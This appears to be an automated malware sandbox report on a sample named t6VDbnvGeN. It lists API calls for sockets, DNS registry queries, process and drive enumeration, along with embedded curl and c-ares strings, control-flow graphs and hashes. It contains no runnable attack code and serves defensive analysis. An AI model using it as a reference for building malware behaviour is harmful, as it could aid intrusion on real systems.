                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1426333607.00000000007C1000.00000040.00000001.01000000.00000004.sdmp, Offset: 007C0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7c0000_t6VDbnvGeN.jbxd
                                                              Similarity
                                                              • API ID: EventSelect$EnumEventsNetwork
                                                              • String ID: N=|$multi.c
                                                              • API String ID: 2170980988-2293498705
                                                              • Opcode ID: 3f32086f42aa9a87b5987cfad9a7ef866af32c574a6b7f798b05ce03139e0301
                                                              • Instruction ID: f64b0e2a0af746ec0008185d7660d680154e0f868d16389521145abed6364641
                                                              • Opcode Fuzzy Hash: 3f32086f42aa9a87b5987cfad9a7ef866af32c574a6b7f798b05ce03139e0301
                                                              • Instruction Fuzzy Hash: 7BD19D756083019FEB10CF24C885BABBBF5FF94354F04982EF98496242E778E954DB92

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1712 (entry block 88b180-88b195): graph node and edge listing omitted; the API call it references is listed under APIs below.
                                                              APIs
                                                              • getsockname.WS2_32(-00000020,-00000020,?), ref: 0088B2B7
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1426333607.00000000007C1000.00000040.00000001.01000000.00000004.sdmp, Offset: 007C0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7c0000_t6VDbnvGeN.jbxd
                                                              Similarity
                                                              • API ID: getsockname
                                                              • String ID: ares__sortaddrinfo.c$cur != NULL
                                                              • API String ID: 3358416759-2430778319
                                                              • Opcode ID: db7cd6461b19be421fc584f029af9ad1a28bc74b11a6d27cf2c82692fa69158a
                                                              • Instruction ID: 7f5c1b5f0fd3325efb51e599d9f1492e2126aee6edc7db51d13dc5575e2465a2
                                                              • Opcode Fuzzy Hash: db7cd6461b19be421fc584f029af9ad1a28bc74b11a6d27cf2c82692fa69158a
                                                              • Instruction Fuzzy Hash: 38C16D716043159FD718EF28C881A6AB7E1FFC9314F048969E849DB3A2EB31ED45CB81
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1426333607.00000000007C1000.00000040.00000001.01000000.00000004.sdmp, Offset: 007C0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7c0000_t6VDbnvGeN.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 33d043bb1becd44b1c6c656b4cd864c5606641fb59ef40534fcae261e1402dca
                                                              • Instruction ID: 9c3e239c7b33572b5e073deb133f79e4841b7fd8d435a0151f1fc3fe5e3c960f
                                                              • Opcode Fuzzy Hash: 33d043bb1becd44b1c6c656b4cd864c5606641fb59ef40534fcae261e1402dca
                                                              • Instruction Fuzzy Hash: 5E91F43060D3494BD7398A2888807BBB2F5FFC5364F548B2EE898432D4FB79AD40D691
                                                              APIs
                                                              • recvfrom.WS2_32(?,?,?,00000000,00001001,?,?,?,?,?,0087712E,?,?,?,00001001,00000000), ref: 0088A90D
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1426333607.00000000007C1000.00000040.00000001.01000000.00000004.sdmp, Offset: 007C0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7c0000_t6VDbnvGeN.jbxd
                                                              Similarity
                                                              • API ID: recvfrom
                                                              • String ID:
                                                              • API String ID: 846543921-0
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1441141625.0000000007540000.00000040.00001000.00020000.00000000.sdmp, Offset: 07540000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7540000_t6VDbnvGeN.jbxd
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1441141625.0000000007540000.00000040.00001000.00020000.00000000.sdmp, Offset: 07540000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7540000_t6VDbnvGeN.jbxd
                                                              APIs
                                                              • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters,00000000,00020019,?), ref: 0087AA19
                                                              • RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,00000000), ref: 0087AA4C
                                                              • RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,?), ref: 0087AA97
                                                              • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,00000000), ref: 0087AAE9
                                                              • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,?), ref: 0087AB30
                                                              • RegCloseKey.KERNELBASE(?), ref: 0087AB6A
                                                              • RegOpenKeyExA.KERNELBASE(80000002,Software\Policies\Microsoft\Windows NT\DNSClient,00000000,00020019,?), ref: 0087AB82
                                                              • RegOpenKeyExA.KERNELBASE(80000002,Software\Policies\Microsoft\System\DNSClient,00000000,00020019,?), ref: 0087AC46
                                                              • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces,00000000,00020019,?), ref: 0087AD0A
                                                              • RegEnumKeyExA.KERNELBASE ref: 0087AD8D
                                                              • RegCloseKey.KERNELBASE(?), ref: 0087ADD9
                                                              • RegEnumKeyExA.KERNELBASE ref: 0087AE08
                                                              • RegOpenKeyExA.KERNELBASE(?,?,00000000,00000001,?), ref: 0087AE2A
                                                              • RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,00000000), ref: 0087AE54
                                                              • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,00000000), ref: 0087AF63
                                                              • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,?), ref: 0087AFB2
                                                              • RegQueryValueExA.KERNELBASE(?,DhcpDomain,00000000,00000000,00000000,00000000), ref: 0087B072
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1426333607.00000000007C1000.00000040.00000001.01000000.00000004.sdmp, Offset: 007C0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7c0000_t6VDbnvGeN.jbxd
                                                              Similarity
                                                              • API ID: QueryValue$Open$CloseEnum
                                                              • String ID: DhcpDomain$Domain$PrimaryDNSSuffix$SearchList$Software\Policies\Microsoft\System\DNSClient$Software\Policies\Microsoft\Windows NT\DNSClient$System\CurrentControlSet\Services\Tcpip\Parameters$System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces
                                                              • API String ID: 4217438148-1047472027
                                                              APIs
                                                              • setsockopt.WS2_32(?,00000006,00000001,00000001,00000004), ref: 007FA832
                                                              Strings
                                                              • @, xrefs: 007FAC42
                                                              • @, xrefs: 007FA8F4
                                                              • Couldn't bind to '%s' with errno %d: %s, xrefs: 007FAE1F
                                                              • Local Interface %s is ip %s using address family %i, xrefs: 007FAE60
                                                              • Trying %s:%d..., xrefs: 007FA7C2, 007FA7DE
                                                              • bind failed with errno %d: %s, xrefs: 007FB080
                                                              • cf-socket.c, xrefs: 007FA5CD, 007FA735
                                                              • sa_addr inet_ntop() failed with errno %d: %s, xrefs: 007FA6CE
                                                              • Trying [%s]:%d..., xrefs: 007FA689
                                                              • cf_socket_open() -> %d, fd=%d, xrefs: 007FA796
                                                              • Couldn't bind to interface '%s' with errno %d: %s, xrefs: 007FAD0A
                                                              • Local port: %hu, xrefs: 007FAF28
                                                              • Bind to local port %d failed, trying next, xrefs: 007FAFE5
                                                              • Name '%s' family %i resolved to '%s' family %i, xrefs: 007FADAC
                                                              • Could not set TCP_NODELAY: %s, xrefs: 007FA871
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1426333607.00000000007C1000.00000040.00000001.01000000.00000004.sdmp, Offset: 007C0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7c0000_t6VDbnvGeN.jbxd
                                                              Similarity
                                                              • API ID: setsockopt
                                                              • String ID: Trying %s:%d...$ Trying [%s]:%d...$ @$ @$Bind to local port %d failed, trying next$Could not set TCP_NODELAY: %s$Couldn't bind to '%s' with errno %d: %s$Couldn't bind to interface '%s' with errno %d: %s$Local Interface %s is ip %s using address family %i$Local port: %hu$Name '%s' family %i resolved to '%s' family %i$bind failed with errno %d: %s$cf-socket.c$cf_socket_open() -> %d, fd=%d$sa_addr inet_ntop() failed with errno %d: %s
                                                              • API String ID: 3981526788-2373386790

                                                              APIs
                                                              • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters,00000000,00020019,?), ref: 00889946
                                                              • RegQueryValueExA.KERNELBASE(?,DatabasePath,00000000,00000000,?,00000104), ref: 00889974
                                                              • RegCloseKey.KERNELBASE(?), ref: 0088998B
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1426333607.00000000007C1000.00000040.00000001.01000000.00000004.sdmp, Offset: 007C0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7c0000_t6VDbnvGeN.jbxd
                                                              Similarity
                                                              • API ID: CloseOpenQueryValue
                                                              • String ID: #$#$CARES_HOSTS$DatabasePath$System\CurrentControlSet\Services\Tcpip\Parameters$\hos$sts
                                                              • API String ID: 3677997916-4129964100

                                                              APIs
                                                              • connect.WS2_32(?,?,00000001), ref: 007F8C30
                                                              • SleepEx.KERNELBASE(00000000,00000000), ref: 007F8CF3
                                                              • getsockopt.WS2_32(?,0000FFFF,00001007,00000000,00000004), ref: 007F8D0F
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1426333607.00000000007C1000.00000040.00000001.01000000.00000004.sdmp, Offset: 007C0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7c0000_t6VDbnvGeN.jbxd
                                                              Similarity
                                                              • API ID: Sleepconnectgetsockopt
                                                              • String ID: cf-socket.c$connect to %s port %u from %s port %d failed: %s$connected$local address %s port %d...$not connected yet
                                                              • API String ID: 1669343778-879669977
                                                              • Opcode ID: 53f5d23c6d7d3886b3fa4b2f98e3ad1fae786dda63bac181a34f4944d3cd3a80
                                                              • Instruction ID: f1bfecfe7ed1143f7b97306a3fb2222cb6f9946c2163b0f3b0b559a4e4c0482a
                                                              • Opcode Fuzzy Hash: 53f5d23c6d7d3886b3fa4b2f98e3ad1fae786dda63bac181a34f4944d3cd3a80
                                                              • Instruction Fuzzy Hash: 64B1B0B060430AAFDB50CF24C985BB6B7E0AF45314F148929EA594B3D2DB79EC45C763

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1488 7c2f17-7c2f8c call c40df0 call c411e0 1493 7c31c9-7c31cd 1488->1493 1494 7c2f91-7c2ff4 call 7c1619 RegOpenKeyExA 1493->1494 1495 7c31d3-7c31d6 1493->1495 1498 7c2ffa-7c300b 1494->1498 1499 7c31c5 1494->1499 1500 7c315c-7c31ac RegEnumKeyExA 1498->1500 1499->1493 1501 7c3010-7c3083 call 7c1619 RegOpenKeyExA 1500->1501 1502 7c31b2-7c31c2 1500->1502 1506 7c314e-7c3152 1501->1506 1507 7c3089-7c30d4 RegQueryValueExA 1501->1507 1502->1499 1506->1500 1508 7c313b-7c314b RegCloseKey 1507->1508 1509 7c30d6-7c3137 call c410c0 call c41150 call c411e0 call c40ff0 call c411e0 call c3f560 1507->1509 1508->1506 1509->1508
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1426333607.00000000007C1000.00000040.00000001.01000000.00000004.sdmp, Offset: 007C0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7c0000_t6VDbnvGeN.jbxd
                                                              Similarity
                                                              • API ID: EnumOpen
                                                              • String ID: d
                                                              • API String ID: 3231578192-2564639436
                                                              • Opcode ID: 2f70b84d610cc517d89a22bd3a3ba3c6719bb311b5936b412e775989d885ab61
                                                              • Instruction ID: c9dde92f6bd9cd3c9cf421cd1172114c9aafea58694b7c7e6dd2142ed470b113
                                                              • Opcode Fuzzy Hash: 2f70b84d610cc517d89a22bd3a3ba3c6719bb311b5936b412e775989d885ab61
                                                              • Instruction Fuzzy Hash: 5F71A3B49043199FDB10EF69C98479EBBF0FF85308F10885DE99897301E7749A899F92

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1522 7c76a0-7c76be 1523 7c76e6-7c76f2 send 1522->1523 1524 7c76c0-7c76c7 1522->1524 1526 7c775e-7c7762 1523->1526 1527 7c76f4-7c7709 call 7c72a0 1523->1527 1524->1523 1525 7c76c9-7c76d1 1524->1525 1528 7c770b-7c7759 call 7c72a0 call 7ccb20 call b48c50 1525->1528 1529 7c76d3-7c76e4 1525->1529 1527->1526 1528->1526 1529->1527
                                                              APIs
                                                              • send.WS2_32(multi.c,?,?,?,N=|,00000000,?,?,007D07BF), ref: 007C76EA
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1426333607.00000000007C1000.00000040.00000001.01000000.00000004.sdmp, Offset: 007C0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7c0000_t6VDbnvGeN.jbxd
                                                              Similarity
                                                              • API ID: send
                                                              • String ID: LIMIT %s:%d %s reached memlimit$N=|$SEND %s:%d send(%lu) = %ld$multi.c$send
                                                              • API String ID: 2809346765-873368536
                                                              • Opcode ID: 0985199f572590fe3a7b6d23516f1d1f0f3a982703a299d8d66c087eb570cc1e
                                                              • Instruction ID: 71eb04edd8ea62f6266dc4c85cce08a54b2ea8dda25a94e9c4e1a7550c76e5b1
                                                              • Opcode Fuzzy Hash: 0985199f572590fe3a7b6d23516f1d1f0f3a982703a299d8d66c087eb570cc1e
                                                              • Instruction Fuzzy Hash: 29113DB164D3047FD5109B159C49F3B7B5DDBC2B28F44090CFC0823242D9659D05C6F1

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1641 7f9290-7f92ed call 7c76a0 1644 7f93c3-7f93ce 1641->1644 1645 7f92f3-7f92fb 1641->1645 1652 7f93e5-7f9427 call 7dd090 call 804f40 1644->1652 1653 7f93d0-7f93e1 1644->1653 1646 7f93aa-7f93af 1645->1646 1647 7f9301-7f9333 call 7dd8c0 call 7dd9a0 1645->1647 1650 7f9456-7f9470 1646->1650 1651 7f93b5-7f93bc 1646->1651 1665 7f93a7 1647->1665 1666 7f9335-7f9364 WSAIoctl 1647->1666 1655 7f93be 1651->1655 1656 7f9429-7f9431 1651->1656 1652->1650 1652->1656 1653->1651 1657 7f93e3 1653->1657 1655->1650 1660 7f9439-7f943f 1656->1660 1661 7f9433-7f9437 1656->1661 1657->1650 1660->1650 1664 7f9441-7f9453 call 8050a0 1660->1664 1661->1650 1661->1660 1664->1650 1665->1646 1669 7f939b-7f93a4 1666->1669 1670 7f9366-7f936f 1666->1670 1669->1665 1670->1669 1673 7f9371-7f9390 setsockopt 1670->1673 1673->1669 1674 7f9392-7f9395 1673->1674 1674->1669
                                                              APIs
                                                              • WSAIoctl.WS2_32(?,4004747B,00000000,00000000,?,00000004,?,00000000,00000000), ref: 007F935D
                                                              • setsockopt.WS2_32(?,0000FFFF,00001001,00000000,00000004,?,00000004,?,00000000,00000000), ref: 007F9389
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1426333607.00000000007C1000.00000040.00000001.01000000.00000004.sdmp, Offset: 007C0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7c0000_t6VDbnvGeN.jbxd
                                                              Similarity
                                                              • API ID: Ioctlsetsockopt
                                                              • String ID: Send failure: %s$cf-socket.c$send(len=%zu) -> %d, err=%d
                                                              • API String ID: 1903391676-2691795271
                                                              • Opcode ID: 53de970151c99c9bad65999742a364b790d6f985b90d809193fc34c5d2cbee5d
                                                              • Instruction ID: b55c7c07da1788ef96bf7adbe6595d394621f9fc589cf5d4da6bbfad3ed1950b
                                                              • Opcode Fuzzy Hash: 53de970151c99c9bad65999742a364b790d6f985b90d809193fc34c5d2cbee5d
                                                              • Instruction Fuzzy Hash: E851E371A00349ABDB14DF24C885FBAB7A5FF84314F148529FE489B382E735E991CB91

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1675 7c7770-7c778e 1676 7c77b6-7c77c2 recv 1675->1676 1677 7c7790-7c7797 1675->1677 1679 7c782e-7c7832 1676->1679 1680 7c77c4-7c77d9 call 7c72a0 1676->1680 1677->1676 1678 7c7799-7c77a1 1677->1678 1681 7c77db-7c7829 call 7c72a0 call 7ccb20 call b48c50 1678->1681 1682 7c77a3-7c77b4 1678->1682 1680->1679 1681->1679 1682->1680
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1426333607.00000000007C1000.00000040.00000001.01000000.00000004.sdmp, Offset: 007C0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7c0000_t6VDbnvGeN.jbxd
                                                              Similarity
                                                              • API ID: recv
                                                              • String ID: LIMIT %s:%d %s reached memlimit$RECV %s:%d recv(%lu) = %ld$recv
                                                              • API String ID: 1507349165-640788491
                                                              • Opcode ID: 258341b3bfb8b5ecac71d8e70b7e22d53a5deb813f5d2ce695fdef2fa20f80c9
                                                              • Instruction ID: 747d530f5dda502f6ebc6f10a3230c9e9dffcde50bd48c318de926013b45d3ab
                                                              • Opcode Fuzzy Hash: 258341b3bfb8b5ecac71d8e70b7e22d53a5deb813f5d2ce695fdef2fa20f80c9
                                                              • Instruction Fuzzy Hash: E61127B560A3187FD110AB119C4AF27BB9DDBC6B68F04091CBC0823342DA659D05CAF2

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1694 7c75e0-7c75ed 1695 7c75ef-7c75f6 1694->1695 1696 7c7607-7c7629 socket 1694->1696 1695->1696 1697 7c75f8-7c75ff 1695->1697 1698 7c763f-7c7642 1696->1698 1699 7c762b-7c763c call 7c72a0 1696->1699 1700 7c7601-7c7602 1697->1700 1701 7c7643-7c7699 call 7c72a0 call 7ccb20 call b48c50 1697->1701 1699->1698 1700->1696
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1426333607.00000000007C1000.00000040.00000001.01000000.00000004.sdmp, Offset: 007C0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7c0000_t6VDbnvGeN.jbxd
                                                              Similarity
                                                              • API ID: socket
                                                              • String ID: FD %s:%d socket() = %d$LIMIT %s:%d %s reached memlimit$socket
                                                              • API String ID: 98920635-842387772
                                                              • Opcode ID: 5c3cb12295f4a24b4910ab21e528153c53f003cf7b740b1d4599fb167367de02
                                                              • Instruction ID: e1322304fc1192c810e1388e760372b778b5f6b5353086720df3270e3f9a5392
                                                              • Opcode Fuzzy Hash: 5c3cb12295f4a24b4910ab21e528153c53f003cf7b740b1d4599fb167367de02
                                                              • Instruction Fuzzy Hash: 6C11AB72A052113BDA10AB29AC5AF5B7F99DFC2734F04091CF804B22E2DA158C59C6F1

                                                              APIs
                                                              • getsockname.WS2_32(?,?,00000080), ref: 007FA1C7
                                                              Strings
                                                              • ssloc inet_ntop() failed with errno %d: %s, xrefs: 007FA23B
                                                              • getsockname() failed with errno %d: %s, xrefs: 007FA1F0
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1426333607.00000000007C1000.00000040.00000001.01000000.00000004.sdmp, Offset: 007C0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7c0000_t6VDbnvGeN.jbxd
                                                              Similarity
                                                              • API ID: getsockname
                                                              • String ID: getsockname() failed with errno %d: %s$ssloc inet_ntop() failed with errno %d: %s
                                                              • API String ID: 3358416759-2605427207
                                                              • Opcode ID: 9c4d2744e9942caa581ae3792c22e6354e4623e0a95e83c8760bea24b98dc508
                                                              • Instruction ID: a112b8c113f42ade33dcb8149dbc7dd85b1eaff01b73f04448262a9fddd761ff
                                                              • Opcode Fuzzy Hash: 9c4d2744e9942caa581ae3792c22e6354e4623e0a95e83c8760bea24b98dc508
                                                              • Instruction Fuzzy Hash: C921F871948284BAE7219B18DC46FF773BCEFD1324F040614FA9853152FF32598A86E2

                                                              APIs
                                                              • WSAStartup.WS2_32(00000202), ref: 007DD65A
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1426333607.00000000007C1000.00000040.00000001.01000000.00000004.sdmp, Offset: 007C0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7c0000_t6VDbnvGeN.jbxd
                                                              Similarity
                                                              • API ID: Startup
                                                              • String ID: if_nametoindex$iphlpapi.dll
                                                              • API String ID: 724789610-3097795196
                                                              • Opcode ID: f7f1de9ae7232a8d87c1f4147d98f253a450b86bbdcbbbd4a4725855fa79fa09
                                                              • Instruction ID: 34b6ad77e12aa8be8bbcde8d1996c046f7a54021e41a0a50014da0b63796d531
                                                              • Opcode Fuzzy Hash: f7f1de9ae7232a8d87c1f4147d98f253a450b86bbdcbbbd4a4725855fa79fa09
                                                              • Instruction Fuzzy Hash: 850144D09443415AF72177385C1B77535A55B91344F440869D848D63D2FB6DCD5DC1E3

                                                              APIs
                                                              • socket.WS2_32(FFFFFFFF,?,00000000), ref: 0088AB9B
                                                              • ioctlsocket.WS2_32(00000000,8004667E,00000001), ref: 0088ABE3
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1426333607.00000000007C1000.00000040.00000001.01000000.00000004.sdmp, Offset: 007C0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7c0000_t6VDbnvGeN.jbxd
                                                              Similarity
                                                              • API ID: ioctlsocketsocket
                                                              • String ID:
                                                              • API String ID: 416004797-0
                                                              • Opcode ID: bf58a1ee1e82827a298edf38243db0d22c475b25e1371bf19ccf22548a19f304
                                                              • Instruction ID: 48d46442723e6dcd1d08aa4f587c04a7d14bbb8022f5ea4c4d1c5784fb9d5b28
                                                              • Opcode Fuzzy Hash: bf58a1ee1e82827a298edf38243db0d22c475b25e1371bf19ccf22548a19f304
                                                              • Instruction Fuzzy Hash: 1CE1B0706043029BEB28DF24C884B6B77A5FF89314F144A2EF998DB2D1E775D944CB92
                                                              APIs
                                                              • Process32NextW.KERNEL32(?,?,?,?), ref: 075B0396
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1441447511.00000000075B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 075B0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_75b0000_t6VDbnvGeN.jbxd
                                                              Similarity
                                                              • API ID: NextProcess32
                                                              • String ID: aZXP
                                                              • API String ID: 1850201408-3618135372
                                                              • Opcode ID: dffb74c325e1560185ac781d1a70617359ee9cedc63e578faf6230afdb0e0ab9
                                                              • Instruction ID: 77ffbdb326f169b4fb1930e5b8713733628659d831c3ac6f061659397125e5d3
                                                              • Opcode Fuzzy Hash: dffb74c325e1560185ac781d1a70617359ee9cedc63e578faf6230afdb0e0ab9
                                                              • Instruction Fuzzy Hash: 3961D6EB25C2217DB12285816F18EFB572EF6D3730B308826F80BD7682E2D54E4E5071
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1441447511.00000000075B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 075B0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_75b0000_t6VDbnvGeN.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: aZXP
                                                              • API String ID: 0-3618135372
                                                              • Opcode ID: 3cb61c9e54f8b8cd1a00bac4da8a8725733dce085472a744b9ae65f520a954ba
                                                              • Instruction ID: efddaaf6f69982fa08f5715303f97debbc6cfa293bf8a120c006d0b8a6968f4e
                                                              • Opcode Fuzzy Hash: 3cb61c9e54f8b8cd1a00bac4da8a8725733dce085472a744b9ae65f520a954ba
                                                              • Instruction Fuzzy Hash: 3A61B6EB15C215BDB12285816F18EFB5B6EF6D3730B308826F80BD6682E2D94E4E5171
                                                              APIs
                                                              • Process32NextW.KERNEL32(?,?,?,?), ref: 075B0396
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1441447511.00000000075B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 075B0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_75b0000_t6VDbnvGeN.jbxd
                                                              Similarity
                                                              • API ID: NextProcess32
                                                              • String ID: aZXP
                                                              • API String ID: 1850201408-3618135372
                                                              • Opcode ID: 598e000e77d7017cca06a4c46cf1fd169b31a3f42dd5fe190dc7bd2a0881c8bc
                                                              • Instruction ID: 6251125c1cab7bcf765170d0bc5b25bb80ba2da2897a8610a6b8a0aabacfaee6
                                                              • Opcode Fuzzy Hash: 598e000e77d7017cca06a4c46cf1fd169b31a3f42dd5fe190dc7bd2a0881c8bc
                                                              • Instruction Fuzzy Hash: C061B3EB25C215BDB12285816F18EFB676EF6D3730B308826F80BD7682E2D54E4E5171
                                                              APIs
                                                              • Process32NextW.KERNEL32(?,?,?,?), ref: 075B0396
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1441447511.00000000075B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 075B0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_75b0000_t6VDbnvGeN.jbxd
                                                              Similarity
                                                              • API ID: NextProcess32
                                                              • String ID: aZXP
                                                              • API String ID: 1850201408-3618135372
                                                              • Opcode ID: ecfa45bb4dad15186a083565c9bcf9ce10c87b23ce479e63b2c627820d804675
                                                              • Instruction ID: 13b299f1625d96b11b035e1ffc78d30ed77c613866f6846cb4ca5c9bab03ad96
                                                              • Opcode Fuzzy Hash: ecfa45bb4dad15186a083565c9bcf9ce10c87b23ce479e63b2c627820d804675
                                                              • Instruction Fuzzy Hash: D861B6EB25C225BDB12285816F18EFB5B2EF5D3730B308826F80BD7682E2D54E4E5071
                                                              APIs
                                                              • Process32NextW.KERNEL32(?,?,?,?), ref: 075B0396
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1441447511.00000000075B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 075B0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_75b0000_t6VDbnvGeN.jbxd
                                                              Similarity
                                                              • API ID: NextProcess32
                                                              • String ID: aZXP
                                                              • API String ID: 1850201408-3618135372
                                                              • Opcode ID: fc7e6e715bf0e19d8b0517f3bc10deea1e1933911bd2ba2d1cd8924024910366
                                                              • Instruction ID: 50ee8e5d6a10cf010447588acb0c098c091b8a34cafa0034eff1bd66687f21b6
                                                              • Opcode Fuzzy Hash: fc7e6e715bf0e19d8b0517f3bc10deea1e1933911bd2ba2d1cd8924024910366
                                                              • Instruction Fuzzy Hash: F051A2EB25C225BDB12285816F18EFB5B2EF5D3730B308826F80BD7682E2D54E4E5171
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1441447511.00000000075B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 075B0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_75b0000_t6VDbnvGeN.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: aZXP
                                                              • API String ID: 0-3618135372
                                                              • Opcode ID: bc01f63196995ccdb4142acb789b32063ba63b5f27e88bdde35b14c84180a461
                                                              • Instruction ID: b72b3071e576a82727489b14467824925ec9627f8634748837a2c9a2b8028585
                                                              • Opcode Fuzzy Hash: bc01f63196995ccdb4142acb789b32063ba63b5f27e88bdde35b14c84180a461
                                                              • Instruction Fuzzy Hash: 6A5184EB25C2257D712285816F18EFB572EF5D7730B30C826F80BD6682E3D54A4E5071
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1441447511.00000000075B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 075B0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_75b0000_t6VDbnvGeN.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: aZXP
                                                              • API String ID: 0-3618135372
                                                              • Opcode ID: a2dd305e11c039d161218acbbc9bd53c0c0dbc9091a1a1a1265103de1708f578
                                                              • Instruction ID: 3c61fea14b4f716a5ef20ef18b8f5ea67aeb52783d0ccf46d6b8c65b8c774154
                                                              • Opcode Fuzzy Hash: a2dd305e11c039d161218acbbc9bd53c0c0dbc9091a1a1a1265103de1708f578
                                                              • Instruction Fuzzy Hash: 2E5182EB25C225BD712284416F68EFB572EF5D7730B31C826F80BD6682E3994A4E1171
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1441223045.0000000007560000.00000040.00001000.00020000.00000000.sdmp, Offset: 07560000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7560000_t6VDbnvGeN.jbxd
                                                              Similarity
                                                              • API ID: DrivesLogical
                                                              • String ID: A:\
                                                              • API String ID: 999431828-3379428675
                                                              • Opcode ID: 7b376d54ac8f816e6e948e81b934565e01b35e93fa45592be9e890460dfd612d
